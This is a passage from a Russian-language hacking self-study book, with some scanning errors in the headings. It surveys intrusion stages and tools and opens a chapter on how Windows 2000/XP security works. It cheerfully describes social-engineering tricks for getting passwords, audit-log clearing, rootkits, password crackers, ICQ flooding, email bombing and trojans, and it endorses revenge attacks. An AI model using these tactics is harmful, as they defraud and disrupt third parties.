гостями по полной программе, так что хакерам приходится прилагать множество усилий и проявлять большую изворотливость, чтобы решить свои задачи.
В полном соответствии с методами взломщиков, орудующих в реальном мире,
которые тщательно планируют нападение на банки и прочие места, где водятся
денежки, настоящие хакеры также разрабатывают сценарии вторжения и готовят
инструменты для доступа к лакомым ресурсам. Эти сценарии могут быть самыми различными, но все они выполняются в три этапа, полностью соответствующие действиям взломщиков в реальном мире: сбор информации — вторжение заметание следов.

информации
С помощью различных источников хакеры ищут информацию, необходимую
для проникновения на чужую территорию. Например, они могут использовать
Интернет, обратившись к сайту организации, в сеть которой они хотят вторгнуться, или рекламные буклеты этой организации, в которых можно найти номера телефонов корпорации, имена сотрудников и адреса их электронной почты
и так далее [3]. Далее хакеры выполняют сканирование сети организации для
выявления ее структуры, инвентаризации общих ресурсов, используемых операционных систем, запущенных программ и систем защиты. Для этого существуют целые наборы программных инструментов, работу с которыми мы будем
описывать на протяжении всей книги.

«Эиоржеиие
Собрав нужную информацию, в состав которой входит структура атакуемой информационной системы, адреса серверов локальной сети организации, используемые операционные системы и средства защиты, хакер приступает к вторжению. Излюбленный средствами массовой информации и Голливудом сюжет
опусов на тему хакинга — взлом через Интернет компьютерной системы на другом конце земного шара — это отнюдь не единственный метод доступа к закрытой информации, хотя и самый эффектный и привлекательный для зрителя. Если
хакер — это настоящий, решительно настроенный охотник за закрытой информацией, для достижения цели он использует тот метод, который наиболее эффективен для решения задачи. Все зависит от обстоятельств, и если у хакера есть
возможность физического доступа к компьютеру, он им воспользуется, поскольку наиболее мощные средства взлома системы защиты предполагают локальный
доступ к компьютерной системе.

14

Хакинг

Сокрытие следов
Каждый злоумышленник перед тем, как покинуть место преступления, заметает
следы, уничтожая отпечатки пальцев и другие следы, которые могут помочь его
идентификации. Так же и хакер должен уничтожить все следы своего вторжения, по которым его могут найти. Никогда не следует забывать, что в любой мало-мальски защищенной системе функционируют средства аудита, регистрирующие все подозрительные действия пользователя. Другая задача заметания следов сокрытие файлов, помещенных хакером в систему, и процессов, запущенных для
слежения за работой легитимных пользователей.
Для очистки следов пребывания существует множество методов, включающих
очистку журналов аудита, сокрытие запущенных программ и процессов помещением их в ядро операционной системы (т.е. той ее части, которая невидима
для пользовательского интерфейса). Скажем, взамен подлинных процедур ядра
операционной системы, хакер может запустить подмененные процедуры, которые будут оповещать его обо всех введенных пользователями паролях входной
регистрации, и выполнять другие действия, например, пересылку хакеру раскрытых паролей по Интернету. Такие задачи выполняются с помощью целых
комплектов программ, которые в просторечии называются наборами отмычек,
или, на сленге, «руткитами» (от английского слова rootkit — корневой комплект
инструментов). «Руткиты» — весьма популярное средство хакинга систем UNIX,
но и Windows 2000 не обойдена вниманием, и в Главе 4, посвященной целиком
вопросам сокрытия следов хакинга, мы еще обсудим эту тему, хотя, надо сказать, настоящий «руткит» для Windows, по видимому, еще на стадии создания.
Другой аспект задачи сокрытия следов связан с Интернетом. При попытках хакинга через Интернет хакер должен скрыть свой IP-адрес, который очень легко
фиксируется системами обнаружения вторжений и далее позволяет выловить
хакера прямо на рабочем месте. И тут мы сталкиваемся с совпадением задач хакинга и антихакинга — задача сохранения своей конфиденциальности актуальна
для обеих сторон. Для решения таких задач существует множество методов, самый лучший из которых — отказ от использования для хакинга компьютеров,
способных выдать ваше местонахождение, подключение через прокси-серверы,
использование специальных программ — брандмауэров, ограничивающих передачу конфиденциальной информации от компьютера пользователя Интернета на
сервер. Мы рассмотрим эти задачи по мере изложения методов хакинга во всех
главах этой книги, а отдельно этой теме посвящена Глава 4 — и автор
НАСТОЯТЕЛЬНО СОВЕТУЕТ ВСЕМ ПРОЧИТАТЬ ЭТУ ГЛАВУ САМЫМ
ВНИМАТЕЛЬНЫМ ОБРАЗОМ, прежде чем применять на деле все те штучки,
которые описаны в этой книге.

15

Самоучитель хакера

Инструменты Хзкинтв
На всех этапах сражений в киберпространстве хакеры и антйхакеры применяют
виртуальное оружие — специальные программные инструменты, для каждого
конкретного сценария атаки — свои. Все это соответствует реальной жизни — в
самом деле, отправляясь на разбой незачем брать с собой отмычки, а для взлома
сейфа не требуется парабеллум. С другой стороны, чтобы защититься от атаки
DoS вовсе не обязательно шифровать все свои файлы, а для защиты от хищения
номеров кредитных карточек вовсе не обязательно устанавливать систему IDS.
В этой главе мы перечислим все описываемые в книге инструменты хакинга
вместе с кратким описанием их функций. Это позволит вам быстро сориентироваться в содержимом книги и не тратить время на изучение тех средств, которые вы не собираетесь применять на практике.

Социальная инженерия
Говоря понятнее, социальная инженерия — это мошенничество, которое представляет собой универсальный и всемогущий инструмент, применяемый практически при всех сценариях вторжения. К социальной инженерии относится
рассылка электронной почты с вирусами и Троянами, телефонные звонки в атакуемую организацию с целью выведать полезную для вторжения информацию,
переговоры в чатах с целью выведать нужные хакеру данные и многое другое.
В начале главы мы привели пример письма, с помощью которого разного рода
личности «напаривают лохов» с целью халявного доступа к Интернету. Другие
примеры писем подобного рода можно найти в журналах «Хакер»; их содержание меняется в зависимости от наклонностей авторов, но есть и нечто общее.
Суть этих писем одна — заставить «ламера» раскрыться и выдать конфиденциальную информацию или выполнить действия, разрушающие систему защиты
компьютера, к примеру, запустить прикрепленное к письму вложение с хакерской программой, скажем, троянского коня.
Что удивительно, так это простота, с помощью которой можно обойти все препятствия системы защиты, воспользовавшись доверчивостью сотрудников атакуемой фирмы. Например, в [3] приводится пример взлома почтового ящика сотрудника фирмы, выполненный с помощью звонка в справочный отдел организации. Выдав себя за директора информационного отдела, «забывшего» свой
пароль, позвонивший в справочный отдел один из авторов книги [3] тут же получил пароль прямо по телефону!
Еще более интересный метод взлома почтового ящика предлагается в [1]. Общаясь в чатах, хакер выведывает адрес почтового ящика своей жертвы (якобы для
последующего общения). Далее хакер пытается открыть этот ящик и, не зная

16

Хакинг
пароля, прибегает к услуге, часто предоставляемой почтовыми серверами забывчивым клиентам — предоставлению пароля при ответе на контрольный вопрос. Как правило, список этих вопросов невелик, и включает такие пункты, как
«Любимое блюдо», «Имя вашей собачки», «Девичья фамилия матери» и тому
подобное. Допустим, при попытке взлома почтового ящика будет задан вопрос
«Любимое блюдо». Все, что теперь нужно сделать хакеру — это, общаясь в чате,
выведать у своей жертвы гастрономические пристрастия.
По мере изложения материала мы будем постоянно обращаться к теме социальной инженерии, поскольку эта тема неисчерпаема. Всем, кто захочет еще больше углубить свои познания в этой области, рекомендуем обратиться к выпускам
журнала «Хакер», все время преподносящего новинки в деятельности такого
рода. Главное условие для их применения — наличие определенных специфических наклонностей и некоторые познания в человеческой психологии.

Предварительный с£ор информации
В приведенном выше примере хакинга почтового ящика имя и фамилию директора информационного отдела взломщики узнали из регистрационной информации доменных имен Интернета. Эту информацию без ограничений предоставляют многие Web-сайты Интернета (например, сайт компании RIPE NCC по адресу http://www.ripe.net). Такие Web-сайты, содержащие базы данных Whols,
весьма полезны для выполнения хакерских атак, тем более, что они не требуют
никаких расходов и специальных программных инструментов.
Другую, не менее обширную информацию о взламываемой системе можно получить из Интернета с помощью различных поисковых систем, например, предоставляемых различными Web-сайтами. К их числу относится Yahoo
(http://www.yahoo.com), или русскоязычный сайт Rambler (http://www.rambler.ru).
Применение этих сайтов весьма разнообразно. Например, просматривая разделы, посвященные финансовым организациям, хакеры ищут компании, находящиеся в процессе реорганизации. Как правило, в таких компаниях царит беспорядок, системы защиты ослабевают, и у хакера появляется шанс запустить коготок в нужный ему информационный ресурс [3].
Очень полезные для хакера сведения предоставляет поисковая система Google
(http://www.google.com), позволяющая найти в Интернете серверы с определенной структурой каталогов. Например, выполнив поиск серверов, содержащих каталог C:\WINNT, можно выявить серверы с операционной системой W i n dows NT/2000. Тем самым будет решена одна из задач инвентаризации компьютерной системы — определение операционной системы, что весьма важно для
выбора стратегии хакинга системы.

17

Самоучитель хакера
Более эффективный поиск нужной информации в Интернете хакер может выполнить с помощью специальных программ, например, утилиты Teleport Pro.
Эта утилита позволяет выполнять поиск в Интернете интересующей хакера информации по указанному ключевому слову, загружать отдельные Web-сайты на
жесткий диск, и исследовать их с целью выявления полезной информации.
Например, хакеры ищут информацию, оставленную в коде HTML Web-страниц
по недосмотру или по неосторожности — телефоны, адреса электронной почты
сотрудников, структуру каталогов сервера HTTP и так далее. Все это весьма
ценное приобретение, поскольку, зная, скажем, телефонный номер организации,
хакер может прозвонить целый диапазон телефонных номеров, близких к найденному номеру, и найти телефонную линию с модемом, подключенным к сетевому компьютеру организации (все это описано в Главе 1 1 книги).
Ну и наконец, очень много ценной информации можно найти в рекламных буклетах и содержимом Web-сайтов организаций — телефоны, адреса электронной
почты сотрудников, их имена. Все эти сведения могут оказаться ниточкой, которая приведет хакера к бреши в системе защиты компьютерной системы.

паролей доступа к файлам
Информационные ресурсы, которые хакер может извлечь из атакуемой системы,
хранятся в файлах документов и базах данных, и именно к ним хакеры пытаются
получить доступ. Решение этой задачи распадается на два этапа.
Во-первых, войдя в систему, хакер должен выполнить то, что называется расширением привилегий, т.е. попытаться получить права пользователя системы с как
можно более широкими правами доступа к ресурсам системы, лучше всего, администратора. Один из путей решения этой задачи — взлом базы данных SAM
(Security Account Manager — Диспетчер учетных записей системы защиты), хранящей пароли доступа к операционной системе в зашифрованном виде. Взлом
базы SAM — весьма заманчивая для хакера цель, и методы ее достижения мы
описываем в Главе 3 этой книги на примере знаменитой программы, ставшей
классикой взлома, LOphtCrack версии LC4 (http://www.atstake.com).
Во-вторых, хакер должен взломать защиту файлов с интересующими его данными, например, почтовый ящик с текущей перепиской, кошелек Windows с номерами кредитных карточек, документы MS Office и так далее. Если файлы данных зашифрованы, то перед хакером встает задача взлома пароля доступа.
Для решения такой задачи существует множество программ, обсуждаемых в
Главе 3 этой книги. Мы описываем целый пакет программ Office Password 3.5
(http://lastbit.com/download.asp) для взлома множества информационных ресурсов Windows — электронной почты, кошельков, архивов и других.
Другие задачи решает программа Revelation от компании SnadBoy
(http://www.snadboy.com). Эта программа позволяет определить пароли, скры18

Хакинг
тые за строкой «*****» в поле ввода пароля — к сожалению, новые приложения
уже не допускают такого простого взлома своих паролей, но кое-какую помощь
программа Revelation оказать в состоянии.
Вообще, задачи взлома доступа к шифрованной информации составляют целую
научную дисциплину, называемую криптоанализом, которая, в свою очередь,
является целым разделом отрасли знаний, называемой криптографией. Для задач
хакинга криптография представляет весьма большую важность.
Антихакеру инструменты взлома паролей также могут пригодиться — кто из нас
не терял пароли доступа к шифрованным файлам или провайдеру Интернета?
Вдобавок, знание возможностей хакерских программ сильно помогает при настройке системы защиты, поскольку заставляет более ответственно подходить к
задаче выбора паролей — вы поймете, что короткий простой пароль — это зияющая дыра в системе защиты.

Агпзкз клиентов Welo
Беспечные путешественники по виртуальным просторам Интернета — это любимая пожива для хакеров. Мало кто задумывается, открывая очередной Web-сайт,
какие цели преследовали создатели сайта, а ведь они вполне способны изрядно
потрепать нервы и опустошить кошелек доверчивого клиента очередного
«бесплатного» сервиса или Интернет-магазина.
Хакер может, пользуясь некоторыми недостатками системы защиты Webбраузеров, сконструировать такую Web-страничку, что браузер доверчивого
Web-путешественника превратится в оружие хакера, размещая и запуская без
ведома хозяина в памяти компьютера враждебные программы. Способы конструирования таких Web-страничек описаны в Главе 5 этой книги.
Другой популярной забавой хакеров можно назвать использование электронной
почты, которая ныне все больше превращается в самый настоящий рассадник
вирусов. В самом деле, открывая ленты новостей различных Web-сайтов, то и
дело сталкиваешься с предупреждениями и страшными историями о только что
появившемся вирусе.
Спамминг также можно отнести к распространенному явлению нынешнего киберпространства. В распоряжении хакера находятся «мейлбомберы», забрасывающие почтовый ящик жертвы разным мусором, и в Главе 6 описана программа с устрашающим названием Death & Destruction Email Bomber — Смертельный
и Всесокрушающий мейлбомбер. Цели таких акций могут быть самыми разнообразными, в том числе самыми злонамеренными. Еще интереснее для хакера залезть в почтовый ящик своего ближнего, а это можно сделать с помощью программы взлома доступа к почтовому серверу, например, описываемой в Главе 6
популярной утилиты Brutus.
19

Самоучитель хакера
Вниманием хакеров не обойдены и другие службы Интернета, например, ICQ. Что
может быть забавнее — выявить IP-адрес своего ICQ-собеседника и с помощью
программы так называемого «флудера» (от английского слова flood — заливать)
послать ICQ-собеседнику целую лавину пакетов, подвешивающих его компьютер! Для этого существует множество программ — например, обсуждаемая в Главе 7 программа ICQ Flooder, входящая в пакет программ ICQ-MultiVar, содержащего целый комплект весьма полезных инструментов для подобного рода проделок в киберпространстве.
Эти инструменты одинаково пригодны и хакеру и антихакеру — например, отслеживая IP-адрес и поведение ICQ-собеседника и имея под рукой флудер ICQ,
можно достичь гораздо большего взаимопонимания обоих сторон, особенно если дать своему собеседнику возможность узнать о наличии у вас таких средств.
Следует только не увлекаться и не стремиться к большему эффекту, чем это необходимо для обороны.

Агпзкз серверов Web
Web-серверы весьма привлекательны для хакера, поскольку эти серверы открыты для атак из Интернета, включая такие опасные атаки, как вторжение в корпоративную сеть и атаки DoS, выводящие из строя Интернет-сервисы сайта.
Недостатки же защиты серверов Интернета, включая сервер IIS 5 (Internet Information Server — Информационный сервер Интернета) компании Microsoft делают
шансы на успех таких атак достаточно реальными.
Для атаки Web-серверов хакер может использовать многочисленные инструменты, которые позволяют сканировать уязвимые сценарии на Web-серверах, отыскивать в коде HTML полезные для взлома системы сведения и выполнять другие действия. В Главе 8 описаны некоторые популярные инструменты этого рода, в частности, программа CGIScan поиска уязвимых сценариев и программа
Brutus, позволяющая взломать защиту серверов IIS методом простого перебора
всех паролей доступа. В Главе 9 мы описываем инструменты, применяемые для
наиболее популярных атак DoS.
Для антихакера инструменты атаки Web-серверов также представляют интерес,
поскольку позволяют выполнять ответные действия против хакеров, мешающих
нормальной работе Web-сервера. Например, распределенную атаку DoS можно
пресечь, посылая на компьютеры-зомби пакеты, препятствующие их работе.
Антихакеру следует также знать возможности инструментов хакинга Webсерверов и, например, избегать применения уязвимых CGI-сценариев. Далее, для
проверки своих сайтов на уязвимость антихакеру очень полезно прибегнуть к
инструментам, применяемым хакерами при сканировании уязвимостей сайтов.

20

Хакинг

Сетевые сканеры
Для взлома доступа к компьютерам сети TCP/IP хакеру, прежде всего, следует
изучить ее структуру, определив подсоединенные к сети компьютеры, их локальные IP-адреса, выявить открытые порты компьютеров и функционирующие
на них операционные системы, службы и приложения. Для этого и существуют
программы сетевых сканеров, функции которых подобны инструментальным
средствам анализа функционирования компьютерной сети.
В Главе 10 мы описываем одну из наиболее популярных хакерских утилит сканирования сети — программу SuperScan, входящую в набор программ foundstone_tools
(http://www.foundstone.com). Также не обойден вниманием пакет программ
W2RK (Windows 2000 Resource Kit — Комплект инструментов администратора
Windows 2000), который настолько полюбился хакерам, что стал называться
комплектом W2HK (Windows 2000 Hacker Tools — Комплект инструментов хакера Windows 2000).
Антихакеру средства сканирования сети полезны в том смысле, что позволяют
выяснить ее уязвимость, не дожидаясь, пока это сделает хакер.

flepex&am сетевого трафика
Программы перехвата сетевого трафика позволяют хакерам вытворять очень
многие штучки, подсоединившись к сетевой кабельной системе с помощью специальных приспособлений, либо просто запустив хакерскую утилиту на легальном сетевом компьютере. Учитывая хаос, который чаще всего царит в локальных сетях организаций с множеством никем не контролируемых компьютеров,
пользователи которых имеют права на установку и запуск каких-угодно служб и
программ, последний вариант действий хакера представляется оптимальным.
Дополнительные возможности предоставляет наличие беспроводных сетей, обмен информацией в которых выполняется по радиоканалам. В таком случае достаточно за стенкой поставить свой компьютер с радиомодемом, чтобы получить
полный доступ к информации, циркулирующей в сети.
Простейшей атакой перехвата данных является снифинг — прослушивание передаваемой по сети информации. В состав этой информации входят пароли доступа к общесетевым ресурсам, сообщения электронной почты, циркулирующие
как внутри сети, так и пересылаемые внешним адресатам, передаваемые по сети
информационные файлы и прочие весьма лакомые для хакера данные. Одна из
наиболее популярных сниферов — программа SpyNet, которая позволяет выполнять весь набор

описанных выше процедур и имеет весьма удобный графический интерфейс.

21

Самоучитель хакера
Антихакер, зная о таких методах хакинга, может предпринять свои меры защиты шифровать передаваемые данные с помощью технологии VPN (Virtual Private
Network — Виртуальные частные сети) или использовать программы, называемые антисниферами, которые выявляют хакерские компьютеры-перехватчики
сетевых данных. Более того, сниферы, как и сетевые сканеры, представляют собой мощные инструменты анализа функционирования сети, и их возможности
по поиску вторжения неисчерпаемы, чем и должен пользоваться любой квалифицированный антихакер.

Устроенные средства операционной системы
Мы уже говорили, как хакеры переименовали пакет утилит W2RK (инструменты
обслуживания Windows 2000) в пакет W2HK — инструменты хакинга Windows 2000,
поскольку утилиты из этого пакета прекрасно подходят для исследования атакуемой системы. В операционной системе Windows имеется и другое средство Проводник (Explorer) Windows, весьма удобный для исследования информационных ресурсов хакнутой системы. Скажем, хакер может прибегнуть к поиску
файлов по определенному ключевому слову, например, password, или пароль.
Как указано в [3], просто удивительно, насколько распространена порочная
практика хранения паролей доступа к закрытым информационным ресурсам,
типа номеров кредитных карточек, в незащищенных текстовых файлах. Так что
взломавший компьютерную систему хакер сможет без труда получить доступ и
к другим интересным ресурсам, найдя, допустим, файл с названием
password.txt или файл, содержащий строку пароль к провайдеру ISP.
Антихакер должен уметь прятать ценные данные от таких инструментов хакинга делать файлы невидимыми, сохранять в шифрованных дисках, присваивать нейтральные имена и так далее. Неплохо также научиться применять средства шифрования, встроенные в файловую систему NTFS компьютеров Windows 2000/XP,
или предоставляемые другими криптографическими приложениями, например,
PGP Desktop Security.

11рограммы~эксплойты
Эксплойты — это программы, которые используют уязвимости для вторжения
в компьютер, т.е. наиболее важные для хакера инструменты. Мы уже упоминали про Web-сайты различных организаций, поддерживающих базы данных
уязвимостей и эксплойтов компьютерных систем (см., например, сайт
http://www.securitylab.ru). В Главе 8 мы опишем технологию применения эксплойтов на примере хакинга сервера IIS. Найдя с помощью сканера CGIScan
уязвимый сценарий, хакер может обратиться к базе данных уязвимостей и эксплойтов и попытаться взломать доступ к серверу. К сожалению, нынче в Интер22

Хакинг
нете очень трудно найти настоящий исполняемый файл эксплойта для современных приложений — в отличие от предыдущего поколения программ, например, для серверов IIS 4. В лучшем случае эксплойты в Web представлены в виде
исходных программных кодов, с которыми еще нужно долго разбираться. Так
что эксплойты — это отнюдь не ключик, открывающий двери к искомому ресурсу, а скорее заготовка для этого ключика. Так что все в ваших руках.
Для антихакера обязательно знание всех уязвимостей и эксплойтов, угрожающих его системе; более того, эти сведения должны непрерывно обновляться, поскольку «безопасность — это процесс» (Брюс Шнайер). То, что надежно защищает вас сегодня, завтра будет непригодно — кто-нибудь, да найдет маленькую
дырочку в системе защиты, а уж расширить ее — это дело техники.

и трояны
Вирусы — это тоже инструменты атаки, которые позволяют внедрить в систему соглядатая или просто злонамеренную программу. Особую опасность представляют
троянские кони — программы, которые внедряются в систему и позволяют хакеру
удаленно управлять хакнутым компьютером. В Главе 10 мы опишем возможности
старого и заслуженного троянского коня NetBUS, который делает взломанный компьютер практически рабом хакера. А установка троянов на атакуемом компьютере не такое уж и сложное дело, как это может показаться. Для этого следует только
разослать письма с вложением — программой троянского коня и дождаться, пока
очередной «ламер» щелкнет на ссылке с заманчивым предложением, скажем, обновить с помощью присланного вложения свой браузер Интернета.
Для борьбы с такими инструментами хакинга существуют антивирусы и специализированные программы удаления троянов. Для антихакера трояны также могут пригодиться — скажем, получив от хакера письмецо с вирусной начинкой,
выявите его злонамеренное содержимое антивирусом и отошлите начинку обратно авторам вместе с благодарностью за заботу. Или, например, вдруг кто-то
украдет ваш компьютер — и тогда, быть может, хитро запрятанный троянский
конь может облегчить поиски вора… Помните однако, что распространение вирусов карается по закону, и автор ни в коем случае не одобряет таких действий.

Заключение
В этой главе мы попытались облегчить читателям работу с книгой — по крайней
мере, теперь вам стала ясна ее структура, и понятно, что следует прочитать, чтобы
научиться выполнять определенную атаку. И в самом деле, зачем знакомиться с
сетевыми атаками, если можно залезть через форточку в комнату с компьютером
(автор не советует), извлечь жесткий диск, быстро убежать и познакомиться с ним
в спокойной обстановке? Или, к примеру, стоит ли пытаться залезть через Интер-

23

Самоучитель хакера
нет на сервер организации, политика безопасности которой сводится к листочкам
со списками паролей, приклеенным скотчем к мониторам компьютеров?
В самом деле, почитайте содержимое хакерских сайтов Интернета — и что же?
Оказывается, можно просто залезть в мусорный ящик организации, использующей компьютерные технологии (а кто их не использует), чтобы добыть целый
мешок дискет, документов, всяких бумажек, содержащих практически все — от
паролей доступа к компьютерной сети до самых конфиденциальных данных.
Но в этой книге мы ограничимся хакерскими технологиями, не связанными с
такими экзотическими методами.
Инструменты хакинга весьма разнообразны и выбор наиболее эффективных из
них зависит от опыта и возможностей хакера. Причем, если вас интересует
именно информация, а не всякие интересные штучки, свойственные личностям
наподобие доктора Добрянского, следует избирать наиболее оптимальную тактику вторжений. Антихакеру же следует уделить самое пристальное внимание
всем технологиям хакинга, чтобы не стать субъектом, которого «кул хацкеры»
в просторечии называют «ламером».
А теперь приступим к изучению самих инструментов хакинга, которые позволяют выполнять все эти удивительные вещи, про которые мы часто читаем в
прессе и видим на экранах телевизоров, иногда видим пользователей этих инструментов в сопровождении джентльменов в фуражках и комментариев на тему
«вот что бывает, если не слушаться старших…». Поэтому, чтобы избежать многих неприятностей в дальнейшем, начнем с изучения своего противника — системы защиты компьютеров Windows 2000/XP.

24

Г Л А В А 2.

Защита Windows «ЮО/Xf
Операционные системы семейства Windows 2000 с самого начала разрабатывались с учетом требований документа TCSEC (Trusted Computer System Evaluation
Criteria — Критерии оценки надежной системы) министерства обороны США.
Для обеспечения безопасности компьютерных систем, созданных на базе
Windows 2000, в нее включены средства защиты, поддерживающие три основных компонента.
• Аутентификация.
• Авторизация.

Аудит.

Рассмотрим эти компоненты системы защиты по очереди.

Аутентификация
Аутентификацией называется обеспечение возможности для доказательства одного объекта или субъекта своей идентичности другому объекту или субъекту.
Говоря понятнее, аутентификация — это процедура, подобная установлению
вашей личности, когда вы получаете деньги в сберкассе, покупаете билет на
самолет, регистрируетесь при входе в компьютер и так далее, т.е. доказываете,
что вы — это вы.
Один из способов аутентификации в компьютерной системе состоит во вводе
вашего пользовательского идентификатора, в просторечии называемого «логином» (от английского «log in» — регистрационное имя), и пароля — некой конфиденциальной информации, знание которой обеспечивает владение определенным ресурсом. Получив введенный пользователем логин и пароль, компьютер
сравнивает их со значением, которое хранится в специальной базе данных и,
в случае совпадения, пропускает пользователя в систему.
В компьютерах Windows NT/2000/XP такая база данных называется SAM (Security
Account Manager — Диспетчер защиты учетных записей). База SAM хранит учетные
записи пользователей, включающие в себя все данные, необходимые системе защиты для функционирования. Поэтому взлом базы SAM — одна из самых увлекательных и плодотворных задач хакинга, которую мы описываем в Главе 3 этой книги.
Стоит отметить, что текстовый ввод логина и пароля вовсе не является единственным методом аутентификации. Ныне все большую популярность набирает
аутентификация с помощью электронных сертификатов, пластиковых карт и
биометрических устройств, например, сканеров радужной оболочки глаза.
Также не следует забывать, что процедуру аутентификации применяют компью-

Самоучитель хакера
теры при общении друг с другом, используя при этом весьма сложные криптографические протоколы, обеспечивающие защиту линий связи от прослушивания. А поскольку, как правило, аутентификация необходима обоим объектам,
т.е., например, обоим компьютерам, устанавливающим сетевое взаимодействие,
то аутентификация должна быть взаимной. Иначе, к примеру, покупая товар в не
аутентифицированном Интернет-магазине, вы рискуете потерять (и, как следует
из новостей на эту тему, очень даже с большой вероятностью) свои денежки,
которых, как известно, всегда мало.
В любом случае, для аутентификации в компьютерных системах используются определенные алгоритмы, или, как чаще говорят, протоколы. Сетевые компьютеры
Windows NT 4 для аутентификации друг друга использовали протокол NTLM
(NT LAN Manager — Диспетчер локальной сети NT). Далее NTLM вошел в состав
сетевых средств компьютеров Windows 2000/XP. Протокол NTLM, как и его предшественник, протокол LM (LAN Manager — Диспетчер локальной сети), настолько
хорошо освоен хакерами, что один из способов взлома сетей Windows как раз и состоит в принуждении компьютеров сети аутентифицироваться с помощью NTLM.
В сетях Windows 2000/XP для аутентификации применяется гораздо более совершенный протокол Kerberos, обеспечивающий передачу между компьютерами данных, необходимых для взаимной аутентификации, в зашифрованном
виде. Так что если вы когда-либо регистрировались на компьютере как пользователь домена Windows 2000/XP, то знайте — вы аутентифицируетесь на сервере
Windows 2000 по протоколу Kerberos.
Из всего вышесказанного хакер может сделать вывод — все, что ему нужно для
аутентификации в компьютерной системе Windows 2000/XP — это логин и особенно пароль пользователя. Антихакер, естественно, должен хранить пароль в
полной тайне, поскольку с точки зрения компьютера тот, кто знает ваш логин и
пароль — это вы и никто другой.

Авторизация
После аутентификации пользователя, пытающегося получить доступ к информационным ресурсам, компьютерная система должна проверить, к каким именно ресурсам этот пользователь имеет право обращаться. Данную задачу решает
следующий компонент системы защиты — средства авторизации. Для авторизации пользователей в системах Windows каждому пользователю каждого информационного ресурса, например, файла или папки, определяется набор разрешений доступа. Например, пользователю Васе Пупкину можно разрешить только
чтение важного файла, а Пете Лохову можно разрешить и его модификацию.
Авторизацию не следует путать с аутентификацией, поскольку, например, и
Вася Пупкин, и Петя Лохов оба могут пройти входную аутентификацию, но их
возможности по нанесению системе ущерба могут существенно отличаться.

26

Защита Windows 2000/XP
Чтобы облегчить авторизацию пользователей, в системах Windows NT/2000/XP
разработан набор средств для управления доступом к ресурсам. Эти средства
опираются на концепцию групп пользователей, и суть ее такова. Вместо того,
чтобы для каждого отдельного пользователя устанавливать множество разрешений на доступ к различным ресурсам, эту задачу решают всего один раз для целой группы пользователей. Далее каждый новый пользователь включается в одну из существующих групп и получает те же права, или привилегии на доступ,
которые определены для остальных членов группы. Например, Васю Пупкина
можно включить в группу Гость (Guest), члены которой практически не имеют
никаких прав, а Петю Лохова — в группу Пользователь (User), члены которой
могут открывать и редактировать отдельные документы.
Теперь вам, должно быть, становится ясным, почему следующей задачей хакера
после входной регистрации в системе является расширение привилегий. Без получения прав высокопривилегированной группы, лучше всего группы Администраторы (Administrators), ничего у хакера не выйдет, и останется ему только
одно — «заклеить кулер скотчем» или выключить компьютер при работающем
винчестере, чем и занимаются некоторые странные личности, обитающие в нашем непростом мире…

urn
Ясно, что включенный в гостевую группу Вася Пупкин будет обижен таким
пренебрежением к своей персоне и захочет залезть туда, куда его не пускают.
И вот, чтобы предотвратить его попытки несанкционированного доступа к чужим ресурсам, в системе устанавливают аудит — средства наблюдения за событиями безопасности, т.е. специальная программа начинает отслеживать и фиксировать в журнале события, представляющие потенциальную угрозу вторжения
в систему. В число событий безопасности входят попытки открытия файлов,
входной регистрации в системе, запуска приложений и другие. Так что, если в
системе с установленным аудитом Вася Пупкин попробует открыть файл, не
имея на то разрешений, это событие будет зафиксировано в журнале безопасности, вместе с указанием времени и учетной записи пользователя, вызвавшего
такое событие.
Просматривая журнал безопасности Windows NT/2000/XP, можно определить
очень многое, что позволит идентифицировать хакера, так что одна из важнейших задач хакинга — это очистка журнала безопасности перед уходом. Как это
делается, мы отдельно поговорим в Главе 4, а сейчас сформулируем, что должен
сделать антихакер, чтобы предотвратить все попытки вторжения в систему.
Хорошо организованная защита требует создания политики безопасности, под
которой понимается документ, фиксирующий все правила, параметры, алгоритмы,

27

Самоучитель хакера
процедуры, организационные меры, применяемые организацией для обеспечения компьютерной безопасности.
Например, политика безопасности может включать требование задавать пароли
длиной не менее 11 символов, или обязательный запуск парольной заставки перед кратковременной отлучкой от компьютера, и так далее. Все эти вопросы
достаточно подробно рассмотрены во множестве книг, например, [2], [6], так что
не будем повторяться, а перейдем к более существенным для нас темам — как
работает эта система защиты Windows 2000/XP, и что можно сделать, чтобы она
не работала.

Как работает зашита Windows 2OOO/XP
Работу всей системы защиты Windows 2000/XP обеспечивает служба SRM
(Security Reference Monitor — Монитор защиты обращений). Монитор SRM работает в режиме ядра системы Windows 2000/XP, т.е. невидимо для пользователя.
Однако в системе Windows 2000/XP есть программы, в том числе поддерживающие графический интерфейс, которые позволяют обратиться к различным компонентам монитора SRM. Эти компоненты таковы.
• Диспетчер LSA (Local Security Authority — Локальные средства защиты), проверяющий, имеет ли пользователь разрешения на доступ к системе согласно
политике безопасности, хранимой в специальной базе данных LSA. Иными
словами, диспетчер LSA авторизует пользователей системы согласно принятой политике безопасности. Помимо этого, диспетчер LSA управляет политикой защиты системы и аудитом, а также ведет журнал безопасности.
• Диспетчер SAM (Security Account Manager — Диспетчер учетных записей системы защиты), который поддерживает работу с учетными записями локальных пользователей и групп. Эти учетные записи необходимы для аутентификации пользователей, которые далее авторизуются диспетчером LSA.
• Служба AD (Active Directory — Активный каталог), которая поддерживает базу
данных AD с учетными записями пользователей и групп домена. Эти учетные
записи необходимы для аутентификации пользователей, далее авторизуемых
диспетчером LSA.
• Процедура регистрации, которая получает от пользователя введенный логин
и пароль, после чего выполняет проверку двоякого рода: если при входной
регистрации был указан домен, то контроллеру домена посылается запрос,
причем для связи компьютеров используется протокол Kerberos; если же указан локальный компьютер, то проверку выполняет локальный компьютер.
Вам, наверное, уже стало понятным, как все это работает: процедура регистрации
в диалоге, генерируемом при включении компьютера, предлагает пользователю
28

Защита Windows 2000/XP
ввести свой логин, пароль и указать компьютер/домен, в который он хочет войти.
Далее серверы SAM и AD выполняют аутентификацию пользователя, а сервер
LSA выполняет авторизацию пользователя. Если все прошло нормально, то пользователь входит в систему, и все его действия, т.е. обращения к информационным
ресурсам, контролируются службой SRM.
Это, конечно, чрезвычайно упрощенная модель работы системы защиты
Windows 2000/XP. Однако приведенных данных достаточно, чтобы выявить две
основные уязвимости системы защиты. Во-первых, это наличие баз данных с
паролями пользователей (SAM и AD); во-вторых, это наличие обмена информацией между компьютерами при регистрации пользователя в домене. Посмотрим,
что это нам дает.

SAM
Понятно, что лучше всего искать то, что тебе надо, в местах, которые для этого
отведены по определению. Так что самое лучшее, что может сделать хакер, попав в компьютер, это попробовать взломать доступ к базам SAM и AD, что сразу
